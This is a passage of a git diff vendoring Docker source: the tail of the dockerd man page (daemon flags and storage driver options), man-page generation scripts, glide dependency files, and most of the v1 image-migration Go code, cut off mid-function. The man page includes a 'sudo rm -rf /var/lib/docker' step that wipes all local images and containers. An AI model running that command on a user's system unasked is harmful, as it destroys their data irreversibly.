+  bridge with address fe80::1 which will allow you to create IPv6-enabled
+  containers. Use together with `--fixed-cidr-v6` to provide globally routable
+  IPv6 addresses. IPv6 forwarding will be enabled if not used with
+  `--ip-forward=false`. This may collide with your host's current IPv6
+  settings. For more information please consult the documentation about
+  "Advanced Networking - IPv6".
+
+**--isolation**="*default*"
+   Isolation specifies the type of isolation technology used by containers.
+   Note that the default on Windows server is `process`, and the default on
+   Windows client is `hyperv`. Linux only supports `default`.
+
+**-l**, **--log-level**="*debug*|*info*|*warn*|*error*|*fatal*"
+  Set the logging level. Default is `info`.
+
+**--label**="[]"
+  Set key=value labels to the daemon (displayed in `docker info`)
+
+**--live-restore**=*false*
+  Enable live restore of running containers when the daemon starts so that they
+  are not restarted. This option is applicable only for docker daemon running
+  on Linux host.
+
+**--log-driver**="*json-file*|*syslog*|*journald*|*gelf*|*fluentd*|*awslogs*|*splunk*|*etwlogs*|*gcplogs*|*none*"
+  Default driver for container logs. Default is `json-file`.
+  **Warning**: `docker logs` command works only for `json-file` logging driver.
+
+**--log-opt**=[]
+  Logging driver specific options.
+
+**--mtu**=*0*
+  Set the containers network mtu. Default is `0`.
+
+**--max-concurrent-downloads**=*3*
+  Set the max concurrent downloads for each pull. Default is `3`.
+
+**--max-concurrent-uploads**=*5*
+  Set the max concurrent uploads for each push. Default is `5`.
+
+**-p**, **--pidfile**=""
+  Path to use for daemon PID file. Default is `/var/run/docker.pid`
+
+**--raw-logs**
+  Output daemon logs in full timestamp format without ANSI coloring. If this
+  flag is not set, the daemon outputs condensed, colorized logs if a terminal
+  is detected, or full ("raw") output otherwise.
+
+**--registry-mirror**=*<scheme>://<host>*
+  Prepend a registry mirror to be used for image pulls. May be specified
+  multiple times.
+
+**-s**, **--storage-driver**=""
+  Force the Docker runtime to use a specific storage driver.
+
+**--seccomp-profile**=""
+  Path to seccomp profile.
+
+**--selinux-enabled**=*true*|*false*
+  Enable selinux support. Default is false.
+
+**--shutdown-timeout**=*15*
+  Set the shutdown timeout value in seconds. Default is `15`.
+
+**--storage-opt**=[]
+  Set storage driver options. See STORAGE DRIVER OPTIONS.
+
+**--swarm-default-advertise-addr**=*IP|INTERFACE*
+  Set default address or interface for swarm to advertise as its
+  externally-reachable address to other cluster members. This can be a
+  hostname, an IP address, or an interface such as `eth0`. A port cannot be
+  specified with this option.
+
+**--tls**=*true*|*false*
+  Use TLS; implied by --tlsverify. Default is false.
+
+**--tlscacert**=*~/.docker/ca.pem*
+  Trust certs signed only by this CA.
+
+**--tlscert**=*~/.docker/cert.pem*
+  Path to TLS certificate file.
+
+**--tlskey**=*~/.docker/key.pem*
+  Path to TLS key file.
+
+**--tlsverify**=*true*|*false*
+  Use TLS and verify the remote (daemon: verify client, client: verify daemon).
+  Default is false.
+
+**--userland-proxy**=*true*|*false*
+  Rely on a userland proxy implementation for inter-container and
+  outside-to-container loopback communications. Default is true.
+
+**--userland-proxy-path**=""
+  Path to the userland proxy binary.
+
+**--userns-remap**=*default*|*uid:gid*|*user:group*|*user*|*uid*
+  Enable user namespaces for containers on the daemon. Specifying "default"
+  will cause a new user and group to be created to handle UID and GID range
+  remapping for the user namespace mappings used for contained processes.
+  Specifying a user (or uid) and optionally a group (or gid) will cause the
+  daemon to lookup the user and group's subordinate ID ranges for use as the
+  user namespace mappings for contained processes.
+
+# STORAGE DRIVER OPTIONS
+
+Docker uses storage backends (known as "graphdrivers" in the Docker
+internals) to create writable containers from images.  Many of these
+backends use operating system level technologies and can be
+configured.
+
+Specify options to the storage backend with **--storage-opt** flags. The
+backends that currently take options are *devicemapper*, *zfs* and *btrfs*.
+Options for *devicemapper* are prefixed with *dm*, options for *zfs*
+start with *zfs* and options for *btrfs* start with *btrfs*.
+
+Specifically for devicemapper, the default is a "loopback" model which
+requires no pre-configuration, but is extremely inefficient.  Do not
+use it in production.
+
+To make the best use of Docker with the devicemapper backend, you must
+have a recent version of LVM.  Use `lvm` to create a thin pool; for
+more information see `man lvmthin`.  Then, use `--storage-opt
+dm.thinpooldev` to tell the Docker engine to use that pool for
+allocating images and container snapshots.
+
+## Devicemapper options
+
+#### dm.thinpooldev
+
+Specifies a custom block storage device to use for the thin pool.
+
+If using a block device for device mapper storage, it is best to use `lvm`
+to create and manage the thin-pool volume. This volume is then handed to Docker
+to exclusively create snapshot volumes needed for images and containers.
+
+Managing the thin-pool outside of Engine makes for the most feature-rich
+method of having Docker utilize device mapper thin provisioning as the
+backing storage for Docker containers. The highlights of the lvm-based
+thin-pool management feature include: automatic or interactive thin-pool
+resize support, dynamically changing thin-pool features, automatic thinp
+metadata checking when lvm activates the thin-pool, etc.
+
+As a fallback if no thin pool is provided, loopback files are
+created. Loopback is very slow, but can be used without any
+pre-configuration of storage. It is strongly recommended that you do
+not use loopback in production. Ensure your Engine daemon has a
+`--storage-opt dm.thinpooldev` argument provided.
+
+Example use:
+
+   $ dockerd \
+         --storage-opt dm.thinpooldev=/dev/mapper/thin-pool
+
+#### dm.basesize
+
+Specifies the size to use when creating the base device, which limits
+the size of images and containers. The default value is 10G. Note,
+thin devices are inherently "sparse", so a 10G device which is mostly
+empty doesn't use 10 GB of space on the pool. However, the filesystem
+will use more space for base images the larger the device
+is.
+
+The base device size can be increased at daemon restart which will allow
+all future images and containers (based on those new images) to be of the
+new base device size.
+
+Example use: `dockerd --storage-opt dm.basesize=50G`
+
+This will increase the base device size to 50G. The Docker daemon will throw an
+error if existing base device size is larger than 50G. A user can use
+this option to expand the base device size however shrinking is not permitted.
+
+This value affects the system-wide "base" empty filesystem that may already
+be initialized and inherited by pulled images. Typically, a change to this
+value requires additional steps to take effect:
+
+        $ sudo service docker stop
+        $ sudo rm -rf /var/lib/docker
+        $ sudo service docker start
+
+Example use: `dockerd --storage-opt dm.basesize=20G`
+
+#### dm.fs
+
+Specifies the filesystem type to use for the base device. The
+supported options are `ext4` and `xfs`. The default is `ext4`.
+
+Example use: `dockerd --storage-opt dm.fs=xfs`
+
+#### dm.mkfsarg
+
+Specifies extra mkfs arguments to be used when creating the base device.
+
+Example use: `dockerd --storage-opt "dm.mkfsarg=-O ^has_journal"`
+
+#### dm.mountopt
+
+Specifies extra mount options used when mounting the thin devices.
+
+Example use: `dockerd --storage-opt dm.mountopt=nodiscard`
+
+#### dm.use_deferred_removal
+
+Enables use of deferred device removal if `libdm` and the kernel driver
+support the mechanism.
+
+Deferred device removal means that if device is busy when devices are
+being removed/deactivated, then a deferred removal is scheduled on
+device. And devices automatically go away when last user of the device
+exits.
+
+For example, when a container exits, its associated thin device is removed. If
+that device has leaked into some other mount namespace and can't be removed,
+the container exit still succeeds and this option causes the system to schedule
+the device for deferred removal. It does not wait in a loop trying to remove a
+busy device.
+
+Example use: `dockerd --storage-opt dm.use_deferred_removal=true`
+
+#### dm.use_deferred_deletion
+
+Enables use of deferred device deletion for thin pool devices. By default,
+thin pool device deletion is synchronous. Before a container is deleted, the
+Docker daemon removes any associated devices. If the storage driver can not
+remove a device, the container deletion fails and daemon returns.
+
+`Error deleting container: Error response from daemon: Cannot destroy container`
+
+To avoid this failure, enable both deferred device deletion and deferred
+device removal on the daemon.
+
+`dockerd --storage-opt dm.use_deferred_deletion=true --storage-opt dm.use_deferred_removal=true`
+
+With these two options enabled, if a device is busy when the driver is
+deleting a container, the driver marks the device as deleted. Later, when the
+device isn't in use, the driver deletes it.
+
+In general it should be safe to enable this option by default. It will help
+when unintentional leaking of mount point happens across multiple mount
+namespaces.
+
+#### dm.loopdatasize
+
+**Note**: This option configures devicemapper loopback, which should not be
+used in production.
+
+Specifies the size to use when creating the loopback file for the "data" device
+which is used for the thin pool. The default size is 100G. The file is sparse,
+so it will not initially take up this much space.
+
+Example use: `dockerd --storage-opt dm.loopdatasize=200G`
+
+#### dm.loopmetadatasize
+
+**Note**: This option configures devicemapper loopback, which should not be
+used in production.
+
+Specifies the size to use when creating the loopback file for the "metadata"
+device which is used for the thin pool. The default size is 2G. The file is
+sparse, so it will not initially take up this much space.
+
+Example use: `dockerd --storage-opt dm.loopmetadatasize=4G`
+
+#### dm.datadev
+
+(Deprecated, use `dm.thinpooldev`)
+
+Specifies a custom blockdevice to use for data for a Docker-managed thin pool.
+It is better to use `dm.thinpooldev` - see the documentation for it above for
+discussion of the advantages.
+
+#### dm.metadatadev
+
+(Deprecated, use `dm.thinpooldev`)
+
+Specifies a custom blockdevice to use for metadata for a Docker-managed thin
+pool.  See `dm.datadev` for why this is deprecated.
+
+#### dm.blocksize
+
+Specifies a custom blocksize to use for the thin pool.  The default
+blocksize is 64K.
+
+Example use: `dockerd --storage-opt dm.blocksize=512K`
+
+#### dm.blkdiscard
+
+Enables or disables the use of `blkdiscard` when removing devicemapper devices.
+This is disabled by default due to the additional latency, but as a special
+case with loopback devices it will be enabled, in order to re-sparsify the
+loopback file on image/container removal.
+
+Disabling this on loopback can lead to *much* faster container removal times,
+but it also prevents the space used in `/var/lib/docker` directory from being
+returned to the system for other use when containers are removed.
+
+Example use: `dockerd --storage-opt dm.blkdiscard=false`
+
+#### dm.override_udev_sync_check
+
+By default, the devicemapper backend attempts to synchronize with the `udev`
+device manager for the Linux kernel.  This option allows disabling that
+synchronization, to continue even though the configuration may be buggy.
+
+To view the `udev` sync support of a Docker daemon that is using the
+`devicemapper` driver, run:
+
+        $ docker info
+        [...]
+         Udev Sync Supported: true
+        [...]
+
+When `udev` sync support is `true`, then `devicemapper` and `udev` can
+coordinate the activation and deactivation of devices for containers.
+
+When `udev` sync support is `false`, a race condition occurs between the
+`devicemapper` and `udev` during create and cleanup. The race condition results
+in errors and failures. (For information on these failures, see
+[docker#4036](https://github.com/docker/docker/issues/4036))
+
+To allow the `docker` daemon to start, regardless of whether `udev` sync is
+`false`, set `dm.override_udev_sync_check` to true:
+
+        $ dockerd --storage-opt dm.override_udev_sync_check=true
+
+When this value is `true`, the driver continues and simply warns you the errors
+are happening.
+
+**Note**: The ideal is to pursue a `docker` daemon and environment that does
+support synchronizing with `udev`. For further discussion on this topic, see
+[docker#4036](https://github.com/docker/docker/issues/4036).
+Otherwise, set this flag for migrating existing Docker daemons to a daemon with
+a supported environment.
+
+#### dm.min_free_space
+
+Specifies the min free space percent in a thin pool require for new device
+creation to succeed. This check applies to both free data space as well
+as free metadata space. Valid values are from 0% - 99%. Value 0% disables
+free space checking logic. If user does not specify a value for this option,
+the Engine uses a default value of 10%.
+
+Whenever a new a thin pool device is created (during `docker pull` or during
+container creation), the Engine checks if the minimum free space is available.
+If the space is unavailable, then device creation fails and any relevant
+`docker` operation fails.
+
+To recover from this error, you must create more free space in the thin pool to
+recover from the error. You can create free space by deleting some images and
+containers from tge thin pool. You can also add more storage to the thin pool.
+
+To add more space to an LVM (logical volume management) thin pool, just add
+more storage to the  group container thin pool; this should automatically
+resolve any errors. If your configuration uses loop devices, then stop the
+Engine daemon, grow the size of loop files and restart the daemon to resolve
+the issue.
+
+Example use:: `dockerd --storage-opt dm.min_free_space=10%`
+
+#### dm.xfs_nospace_max_retries
+
+Specifies the maximum number of retries XFS should attempt to complete IO when
+ENOSPC (no space) error is returned by underlying storage device.
+
+By default XFS retries infinitely for IO to finish and this can result in
+unkillable process. To change this behavior one can set xfs_nospace_max_retries
+to say 0 and XFS will not retry IO after getting ENOSPC and will shutdown
+filesystem.
+
+Example use:
+
+    $ sudo dockerd --storage-opt dm.xfs_nospace_max_retries=0
+
+
+## ZFS options
+
+#### zfs.fsname
+
+Set zfs filesystem under which docker will create its own datasets.  By default
+docker will pick up the zfs filesystem where docker graph (`/var/lib/docker`)
+is located.
+
+Example use: `dockerd -s zfs --storage-opt zfs.fsname=zroot/docker`
+
+## Btrfs options
+
+#### btrfs.min_space
+
+Specifies the mininum size to use when creating the subvolume which is used for
+containers. If user uses disk quota for btrfs when creating or running a
+container with **--storage-opt size** option, docker should ensure the **size**
+cannot be smaller than **btrfs.min_space**.
+
+Example use: `docker daemon -s btrfs --storage-opt btrfs.min_space=10G`
+
+# CLUSTER STORE OPTIONS
+
+The daemon uses libkv to advertise the node within the cluster.  Some Key/Value
+backends support mutual TLS, and the client TLS settings used by the daemon can
+be configured using the **--cluster-store-opt** flag, specifying the paths to
+PEM encoded files.
+
+#### kv.cacertfile
+
+Specifies the path to a local file with PEM encoded CA certificates to trust
+
+#### kv.certfile
+
+Specifies the path to a local file with a PEM encoded certificate.  This
+certificate is used as the client cert for communication with the Key/Value
+store.
+
+#### kv.keyfile
+
+Specifies the path to a local file with a PEM encoded private key.  This
+private key is used as the client key for communication with the Key/Value
+store.
+
+# Access authorization
+
+Docker's access authorization can be extended by authorization plugins that
+your organization can purchase or build themselves. You can install one or more
+authorization plugins when you start the Docker `daemon` using the
+`--authorization-plugin=PLUGIN_ID` option.
+
+```bash
+dockerd --authorization-plugin=plugin1 --authorization-plugin=plugin2,...
+```
+
+The `PLUGIN_ID` value is either the plugin's name or a path to its
+specification file. The plugin's implementation determines whether you can
+specify a name or path. Consult with your Docker administrator to get
+information about the plugins available to you.
+
+Once a plugin is installed, requests made to the `daemon` through the command
+line or Docker's Engine API are allowed or denied by the plugin.  If you have
+multiple plugins installed, at least one must allow the request for it to
+complete.
+
+For information about how to create an authorization plugin, see [authorization
+plugin](https://docs.docker.com/engine/extend/authorization/) section in the
+Docker extend section of this documentation.
+
+
+# HISTORY
+Sept 2015, Originally compiled by Shishir Mahajan <shishir.mahajan@redhat.com>
+based on docker.com source material and internal work.
diff --git a/vendor/github.com/docker/docker/man/generate.go b/vendor/github.com/docker/docker/man/generate.go
new file mode 100644
index 0000000000..f21614d94a
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/generate.go
@@ -0,0 +1,43 @@
+package main
+
+import (
+	"fmt"
+	"os"
+
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/commands"
+	"github.com/docker/docker/pkg/term"
+	"github.com/spf13/cobra"
+	"github.com/spf13/cobra/doc"
+)
+
+func generateManPages(path string) error {
+	header := &doc.GenManHeader{
+		Title:   "DOCKER",
+		Section: "1",
+		Source:  "Docker Community",
+	}
+
+	stdin, stdout, stderr := term.StdStreams()
+	dockerCli := command.NewDockerCli(stdin, stdout, stderr)
+	cmd := &cobra.Command{Use: "docker"}
+	commands.AddCommands(cmd, dockerCli)
+
+	cmd.DisableAutoGenTag = true
+	return doc.GenManTreeFromOpts(cmd, doc.GenManTreeOptions{
+		Header:           header,
+		Path:             path,
+		CommandSeparator: "-",
+	})
+}
+
+func main() {
+	path := "/tmp"
+	if len(os.Args) > 1 {
+		path = os.Args[1]
+	}
+	fmt.Printf("Generating man pages into %s\n", path)
+	if err := generateManPages(path); err != nil {
+		fmt.Fprintf(os.Stderr, "Failed to generate man pages: %s\n", err.Error())
+	}
+}
diff --git a/vendor/github.com/docker/docker/man/generate.sh b/vendor/github.com/docker/docker/man/generate.sh
new file mode 100755
index 0000000000..e4126ba4ac
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/generate.sh
@@ -0,0 +1,15 @@
+#!/bin/bash
+#
+# Generate man pages for docker/docker
+#
+
+set -eu
+
+mkdir -p ./man/man1
+
+# Generate man pages from cobra commands
+go build -o /tmp/gen-manpages ./man
+/tmp/gen-manpages ./man/man1
+
+# Generate legacy pages from markdown
+./man/md2man-all.sh -q
diff --git a/vendor/github.com/docker/docker/man/glide.lock b/vendor/github.com/docker/docker/man/glide.lock
new file mode 100644
index 0000000000..5ec765a4c6
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/glide.lock
@@ -0,0 +1,52 @@
+hash: ead3ea293a6143fe41069ebec814bf197d8c43a92cc7666b1f7e21a419b46feb
+updated: 2016-06-20T21:53:35.420817456Z
+imports:
+- name: github.com/BurntSushi/toml
+  version: f0aeabca5a127c4078abb8c8d64298b147264b55
+- name: github.com/cpuguy83/go-md2man
+  version: a65d4d2de4d5f7c74868dfa9b202a3c8be315aaa
+  subpackages:
+  - md2man
+- name: github.com/fsnotify/fsnotify
+  version: 30411dbcefb7a1da7e84f75530ad3abe4011b4f8
+- name: github.com/hashicorp/hcl
+  version: da486364306ed66c218be9b7953e19173447c18b
+  subpackages:
+  - hcl/ast
+  - hcl/parser
+  - hcl/token
+  - json/parser
+  - hcl/scanner
+  - hcl/strconv
+  - json/scanner
+  - json/token
+- name: github.com/inconshreveable/mousetrap
+  version: 76626ae9c91c4f2a10f34cad8ce83ea42c93bb75
+- name: github.com/magiconair/properties
+  version: c265cfa48dda6474e208715ca93e987829f572f8
+- name: github.com/mitchellh/mapstructure
+  version: d2dd0262208475919e1a362f675cfc0e7c10e905
+- name: github.com/russross/blackfriday
+  version: 1d6b8e9301e720b08a8938b8c25c018285885438
+- name: github.com/shurcooL/sanitized_anchor_name
+  version: 10ef21a441db47d8b13ebcc5fd2310f636973c77
+- name: github.com/spf13/cast
+  version: 27b586b42e29bec072fe7379259cc719e1289da6
+- name: github.com/spf13/jwalterweatherman
+  version: 33c24e77fb80341fe7130ee7c594256ff08ccc46
+- name: github.com/spf13/pflag
+  version: dabebe21bf790f782ea4c7bbd2efc430de182afd
+- name: github.com/spf13/viper
+  version: c1ccc378a054ea8d4e38d8c67f6938d4760b53dd
+- name: golang.org/x/sys
+  version: 62bee037599929a6e9146f29d10dd5208c43507d
+  subpackages:
+  - unix
+- name: gopkg.in/yaml.v2
+  version: a83829b6f1293c91addabc89d0571c246397bbf4
+- name: github.com/spf13/cobra
+  repo: https://github.com/dnephin/cobra
+  subpackages:
+  - doc
+  version: v1.3
+devImports: []
diff --git a/vendor/github.com/docker/docker/man/glide.yaml b/vendor/github.com/docker/docker/man/glide.yaml
new file mode 100644
index 0000000000..e99b2670d8
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/glide.yaml
@@ -0,0 +1,12 @@
+package: github.com/docker/docker/man
+import:
+- package: github.com/cpuguy83/go-md2man
+  subpackages:
+  - md2man
+- package: github.com/inconshreveable/mousetrap
+- package: github.com/spf13/pflag
+- package: github.com/spf13/viper
+- package: github.com/spf13/cobra
+  repo: https://github.com/dnephin/cobra
+  subpackages:
+  - doc
diff --git a/vendor/github.com/docker/docker/man/md2man-all.sh b/vendor/github.com/docker/docker/man/md2man-all.sh
new file mode 100755
index 0000000000..97c65c93bc
--- /dev/null
+++ b/vendor/github.com/docker/docker/man/md2man-all.sh
@@ -0,0 +1,22 @@
+#!/bin/bash
+set -e
+
+# get into this script's directory
+cd "$(dirname "$(readlink -f "$BASH_SOURCE")")"
+
+[ "$1" = '-q' ] || {
+	set -x
+	pwd
+}
+
+for FILE in *.md; do
+	base="$(basename "$FILE")"
+	name="${base%.md}"
+	num="${name##*.}"
+	if [ -z "$num" -o "$name" = "$num" ]; then
+		# skip files that aren't of the format xxxx.N.md (like README.md)
+		continue
+	fi
+	mkdir -p "./man${num}"
+	go-md2man -in "$FILE" -out "./man${num}/${name}"
+done
diff --git a/vendor/github.com/docker/docker/migrate/v1/migratev1.go b/vendor/github.com/docker/docker/migrate/v1/migratev1.go
new file mode 100644
index 0000000000..bc42dd2ca4
--- /dev/null
+++ b/vendor/github.com/docker/docker/migrate/v1/migratev1.go
@@ -0,0 +1,504 @@
+package v1
+
+import (
+	"errors"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"runtime"
+	"strconv"
+	"sync"
+	"time"
+
+	"encoding/json"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/distribution/digest"
+	"github.com/docker/docker/distribution/metadata"
+	"github.com/docker/docker/image"
+	imagev1 "github.com/docker/docker/image/v1"
+	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/reference"
+)
+
+type graphIDRegistrar interface {
+	RegisterByGraphID(string, layer.ChainID, layer.DiffID, string, int64) (layer.Layer, error)
+	Release(layer.Layer) ([]layer.Metadata, error)
+}
+
+type graphIDMounter interface {
+	CreateRWLayerByGraphID(string, string, layer.ChainID) error
+}
+
+type checksumCalculator interface {
+	ChecksumForGraphID(id, parent, oldTarDataPath, newTarDataPath string) (diffID layer.DiffID, size int64, err error)
+}
+
+const (
+	graphDirName                 = "graph"
+	tarDataFileName              = "tar-data.json.gz"
+	migrationFileName            = ".migration-v1-images.json"
+	migrationTagsFileName        = ".migration-v1-tags"
+	migrationDiffIDFileName      = ".migration-diffid"
+	migrationSizeFileName        = ".migration-size"
+	migrationTarDataFileName     = ".migration-tardata"
+	containersDirName            = "containers"
+	configFileNameLegacy         = "config.json"
+	configFileName               = "config.v2.json"
+	repositoriesFilePrefixLegacy = "repositories-"
+)
+
+var (
+	errUnsupported = errors.New("migration is not supported")
+)
+
+// Migrate takes an old graph directory and transforms the metadata into the
+// new format.
+func Migrate(root, driverName string, ls layer.Store, is image.Store, rs reference.Store, ms metadata.Store) error {
+	graphDir := filepath.Join(root, graphDirName)
+	if _, err := os.Lstat(graphDir); os.IsNotExist(err) {
+		return nil
+	}
+
+	mappings, err := restoreMappings(root)
+	if err != nil {
+		return err
+	}
+
+	if cc, ok := ls.(checksumCalculator); ok {
+		CalculateLayerChecksums(root, cc, mappings)
+	}
+
+	if registrar, ok := ls.(graphIDRegistrar); !ok {
+		return errUnsupported
+	} else if err := migrateImages(root, registrar, is, ms, mappings); err != nil {
+		return err
+	}
+
+	err = saveMappings(root, mappings)
+	if err != nil {
+		return err
+	}
+
+	if mounter, ok := ls.(graphIDMounter); !ok {
+		return errUnsupported
+	} else if err := migrateContainers(root, mounter, is, mappings); err != nil {
+		return err
+	}
+
+	if err := migrateRefs(root, driverName, rs, mappings); err != nil {
+		return err
+	}
+
+	return nil
+}
+
+// CalculateLayerChecksums walks an old graph directory and calculates checksums
+// for each layer. These checksums are later used for migration.
+func CalculateLayerChecksums(root string, ls checksumCalculator, mappings map[string]image.ID) {
+	graphDir := filepath.Join(root, graphDirName)
+	// spawn some extra workers also for maximum performance because the process is bounded by both cpu and io
+	workers := runtime.NumCPU() * 3
+	workQueue := make(chan string, workers)
+
+	wg := sync.WaitGroup{}
+
+	for i := 0; i < workers; i++ {
+		wg.Add(1)
+		go func() {
+			for id := range workQueue {
+				start := time.Now()
+				if err := calculateLayerChecksum(graphDir, id, ls); err != nil {
+					logrus.Errorf("could not calculate checksum for %q, %q", id, err)
+				}
+				elapsed := time.Since(start)
+				logrus.Debugf("layer %s took %.2f seconds", id, elapsed.Seconds())
+			}
+			wg.Done()
+		}()
+	}
+
+	dir, err := ioutil.ReadDir(graphDir)
+	if err != nil {
+		logrus.Errorf("could not read directory %q", graphDir)
+		return
+	}
+	for _, v := range dir {
+		v1ID := v.Name()
+		if err := imagev1.ValidateID(v1ID); err != nil {
+			continue
+		}
+		if _, ok := mappings[v1ID]; ok { // support old migrations without helper files
+			continue
+		}
+		workQueue <- v1ID
+	}
+	close(workQueue)
+	wg.Wait()
+}
+
+func calculateLayerChecksum(graphDir, id string, ls checksumCalculator) error {
+	diffIDFile := filepath.Join(graphDir, id, migrationDiffIDFileName)
+	if _, err := os.Lstat(diffIDFile); err == nil {
+		return nil
+	} else if !os.IsNotExist(err) {
+		return err
+	}
+
+	parent, err := getParent(filepath.Join(graphDir, id))
+	if err != nil {
+		return err
+	}
+
+	diffID, size, err := ls.ChecksumForGraphID(id, parent, filepath.Join(graphDir, id, tarDataFileName), filepath.Join(graphDir, id, migrationTarDataFileName))
+	if err != nil {
+		return err
+	}
+
+	if err := ioutil.WriteFile(filepath.Join(graphDir, id, migrationSizeFileName), []byte(strconv.Itoa(int(size))), 0600); err != nil {
+		return err
+	}
+
+	if err := ioutils.AtomicWriteFile(filepath.Join(graphDir, id, migrationDiffIDFileName), []byte(diffID), 0600); err != nil {
+		return err
+	}
+
+	logrus.Infof("calculated checksum for layer %s: %s", id, diffID)
+	return nil
+}
+
+func restoreMappings(root string) (map[string]image.ID, error) {
+	mappings := make(map[string]image.ID)
+
+	mfile := filepath.Join(root, migrationFileName)
+	f, err := os.Open(mfile)
+	if err != nil && !os.IsNotExist(err) {
+		return nil, err
+	} else if err == nil {
+		err := json.NewDecoder(f).Decode(&mappings)
+		if err != nil {
+			f.Close()
+			return nil, err
+		}
+		f.Close()
+	}
+
+	return mappings, nil
+}
+
+func saveMappings(root string, mappings map[string]image.ID) error {
+	mfile := filepath.Join(root, migrationFileName)
+	f, err := os.OpenFile(mfile, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, 0600)
+	if err != nil {
+		return err
+	}
+	defer f.Close()
+	if err := json.NewEncoder(f).Encode(mappings); err != nil {
+		return err
+	}
+	return nil
+}
+
+func migrateImages(root string, ls graphIDRegistrar, is image.Store, ms metadata.Store, mappings map[string]image.ID) error {
+	graphDir := filepath.Join(root, graphDirName)
+
+	dir, err := ioutil.ReadDir(graphDir)
+	if err != nil {
+		return err
+	}
+	for _, v := range dir {
+		v1ID := v.Name()
+		if err := imagev1.ValidateID(v1ID); err != nil {
+			continue
+		}
+		if _, exists := mappings[v1ID]; exists {
+			continue
+		}
+		if err := migrateImage(v1ID, root, ls, is, ms, mappings); err != nil {
+			continue
+		}
+	}
+
+	return nil
+}
+
+func migrateContainers(root string, ls graphIDMounter, is image.Store, imageMappings map[string]image.ID) error {
+	containersDir := filepath.Join(root, containersDirName)
+	dir, err := ioutil.ReadDir(containersDir)
+	if err != nil {
+		return err
+	}
+	for _, v := range dir {
+		id := v.Name()
+
+		if _, err := os.Stat(filepath.Join(containersDir, id, configFileName)); err == nil {
+			continue
+		}
+
+		containerJSON, err := ioutil.ReadFile(filepath.Join(containersDir, id, configFileNameLegacy))
+		if err != nil {
+			logrus.Errorf("migrate container error: %v", err)
+			continue
+		}
+
+		var c map[string]*json.RawMessage
+		if err := json.Unmarshal(containerJSON, &c); err != nil {
+			logrus.Errorf("migrate container error: %v", err)
+			continue
+		}
+
+		imageStrJSON, ok := c["Image"]
+		if !ok {
+			return fmt.Errorf("invalid container configuration for %v", id)
+		}
+
+		var image string
+		if err := json.Unmarshal([]byte(*imageStrJSON), &image); err != nil {
+			logrus.Errorf("migrate container error: %v", err)
+			continue
+		}
+
+		imageID, ok := imageMappings[image]
+		if !ok {
+			logrus.Errorf("image not migrated %v", imageID) // non-fatal error
+			continue
+		}
+
+		c["Image"] = rawJSON(imageID)
+
+		containerJSON, err = json.Marshal(c)
+		if err != nil {
+			return err
+		}
+
+		if err := ioutil.WriteFile(filepath.Join(containersDir, id, configFileName), containerJSON, 0600); err != nil {
+			return err
+		}
+
+		img, err := is.Get(imageID)
+		if err != nil {
+			return err
+		}
+
+		if err := ls.CreateRWLayerByGraphID(id, id, img.RootFS.ChainID()); err != nil {
+			logrus.Errorf("migrate container error: %v", err)
+			continue
+		}
+
+		logrus.Infof("migrated container %s to point to %s", id, imageID)
+
+	}
+	return nil
+}
+
+type refAdder interface {
+	AddTag(ref reference.Named, id digest.Digest, force bool) error
+	AddDigest(ref reference.Canonical, id digest.Digest, force bool) error
+}
+
+func migrateRefs(root, driverName string, rs refAdder, mappings map[string]image.ID) error {
+	migrationFile := filepath.Join(root, migrationTagsFileName)
+	if _, err := os.Lstat(migrationFile); !os.IsNotExist(err) {
+		return err
+	}
+
+	type repositories struct {
+		Repositories map[string]map[string]string
+	}
+
+	var repos repositories
+
+	f, err := os.Open(filepath.Join(root, repositoriesFilePrefixLegacy+driverName))
+	if err != nil {
+		if os.IsNotExist(err) {
+			return nil
+		}
+		return err
+	}
+	defer f.Close()
+	if err := json.NewDecoder(f).Decode(&repos); err != nil {
+		return err
+	}
+
+	for name, repo := range repos.Repositories {
+		for tag, id := range repo {
+			if strongID, exists := mappings[id]; exists {
+				ref, err := reference.WithName(name)
+				if err != nil {
+					logrus.Errorf("migrate tags: invalid name %q, %q", name, err)
+					continue
+				}
+				if dgst, err := digest.ParseDigest(tag); err == nil {
+					canonical, err := reference.WithDigest(reference.TrimNamed(ref), dgst)
+					if err != nil {
+						logrus.Errorf("migrate tags: invalid digest %q, %q", dgst, err)
+						continue
+					}
+					if err := rs.AddDigest(canonical, strongID.Digest(), false); err != nil {
+						logrus.Errorf("can't migrate digest %q for %q, err: %q", ref.String(), strongID, err)
+					}
+				} else {
+					tagRef, err := reference.WithTag(ref, tag)
+					if err != nil {
+						logrus.Errorf("migrate tags: invalid tag %q, %q", tag, err)
+						continue
+					}
+					if err := rs.AddTag(tagRef, strongID.Digest(), false); err != nil {
+						logrus.Errorf("can't migrate tag %q for %q, err: %q", ref.String(), strongID, err)
+					}
+				}
+				logrus.Infof("migrated tag %s:%s to point to %s", name, tag, strongID)
+			}
+		}
+	}
+
+	mf, err := os.Create(migrationFile)
+	if err != nil {
+		return err
+	}
+	mf.Close()
+
+	return nil
+}
+
+func getParent(confDir string) (string, error) {
+	jsonFile := filepath.Join(confDir, "json")
+	imageJSON, err := ioutil.ReadFile(jsonFile)
+	if err != nil {
+		return "", err
+	}
+	var parent struct {
+		Parent   string
+		ParentID digest.Digest `json:"parent_id"`
+	}
+	if err := json.Unmarshal(imageJSON, &parent); err != nil {
+		return "", err
+	}
+	if parent.Parent == "" && parent.ParentID != "" { // v1.9
+		parent.Parent = parent.ParentID.Hex()
+	}
+	// compatibilityID for parent
+	parentCompatibilityID, err := ioutil.ReadFile(filepath.Join(confDir, "parent"))
+	if err == nil && len(parentCompatibilityID) > 0 {
+		parent.Parent = string(parentCompatibilityID)
+	}
+	return parent.Parent, nil
+}
+
+func migrateImage(id, root string, ls graphIDRegistrar, is image.Store, ms metadata.Store, mappings map[string]image.ID) (err error) {
+	defer func() {
+		if err != nil {
+			logrus.Errorf("migration failed for %v, err: %v", id, err)
+		}
+	}()
+
+	parent, err := getParent(filepath.Join(root, graphDirName, id))
+	if err != nil {
+		return err
+	}
+
+	var parentID image.ID
+	if parent != "" {
+		var exists bool
+		if parentID, exists = mappings[parent]; !exists {
